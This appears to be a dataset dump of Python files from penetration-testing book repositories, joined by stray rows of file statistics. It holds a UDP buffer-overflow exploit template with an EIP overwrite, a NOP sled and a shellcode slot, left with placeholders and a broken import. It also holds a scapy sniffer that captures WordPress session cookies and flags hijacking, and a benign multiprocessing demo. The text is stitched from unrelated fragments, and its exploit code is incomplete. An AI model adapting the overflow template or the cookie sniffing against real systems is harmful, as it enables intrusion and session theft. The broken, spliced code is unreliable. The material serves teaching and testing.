return request
| 31.37931 | 69 | 0.624733 |
Python-Penetration-Testing-for-Developers | #!/usr/bin/env python
'''
Author: Chris Duffy
Date: May 2015
Name: udp_exploit.py
Purpose: An sample exploit for testing UDP services
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys, socket, strut
rhost = ""
lhost = ""
rport =
fill ="A"*####
eip = struct.pack('<I',0x########)
offset = "\x90"*##
available_shellcode_space = ###
shell =() #Code to insert
# NOPs to fill the remaining space
exploit = fill + eip + offset + shell
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client.sendto(exploit, (rhost, rport))
| 45.547619 | 89 | 0.775333 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import re
import optparse
from scapy.all import *
cookieTable = {}
def fireCatcher(pkt):
raw = pkt.sprintf('%Raw.load%')
r = re.findall('wordpress_[0-9a-fA-F]{32}', raw)
if r and 'Set' not in raw:
if r[0] not in cookieTable.keys():
cookieTable[r[0]] = pkt.getlayer(IP).src
print '[+] Detected and indexed cookie.'
elif cookieTable[r[0]] != pkt.getlayer(IP).src:
print '[*] Detected Conflict for ' + r[0]
print 'Victim = ' + cookieTable[r[0]]
print 'Attacker = ' + pkt.getlayer(IP).src
def main():
parser = optparse.OptionParser("usage %prog -i <interface>")
parser.add_option('-i', dest='interface', type='string',\
help='specify interface to listen on')
(options, args) = parser.parse_args()
if options.interface == None:
print parser.usage
exit(0)
else:
conf.iface = options.interface
try:
sniff(filter='tcp port 80', prn=fireCatcher)
except KeyboardInterrupt:
exit(0)
if __name__ == '__main__':
main()
| 24.590909 | 64 | 0.576889 |
Hands-On-Penetration-Testing-with-Python | #! /usr/bin/python3.5
import multiprocessing as mp
import time
import logging
logging.basicConfig(level=logging.DEBUG,
format='(%(processName)-10s) %(message)s',
)
class Processes():
def __init__(self):
pass
def execute(self,id):
time.sleep(1)
logging.debug("Executed Process : " +str(id))
obj=Processes()
process_list=[]
for i in range(10):
p=mp.Process(name="Process_"+str(i),target=obj.execute,args=(i,))
process_list.append(p)
p.start()
main_process=mp.current_process()
logging.debug("Waiting for 3 seconds")
counter =0
for p in process_list:
if p.is_alive() and counter < 1:
p.join(3)
counter=counter + 1
else:
if p.is_alive():
logging.debug("Killing process: " +p.name )
p.terminate()
logging.debug("Main Ended")
| 20.972222 | 66 | 0.655696 |